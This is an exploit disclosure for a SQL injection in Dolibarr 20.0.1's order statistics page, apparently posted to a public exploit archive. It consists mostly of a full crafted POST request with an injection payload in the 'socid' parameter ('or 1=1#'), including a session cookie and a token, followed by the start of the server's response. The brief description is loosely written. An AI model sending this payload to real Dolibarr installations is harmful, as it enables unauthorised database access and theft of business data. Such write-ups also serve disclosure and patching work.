## Titles: dolibarr 20.0.1 Multiple security token SQLi ## Author: nu11secur1ty ## Date: 10/15/2024 ## Vendor: https://www.dolibarr.org/ ## Software: https://www.dolibarr.org/downloads.php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `socid` parameter appears to be vulnerable to SQL injection attacks. The attacker can get sensitive information for the MySQL database from this system when he attacks it online from inside! He can do this, by using a vulnerable security token to access the web application! STATUS: Medium- Vulnerability [+]Exploits: - SQLi Multiple: ``` POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 357 token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh ``` [+]Response: ```SQLi HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 10:23:43 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80974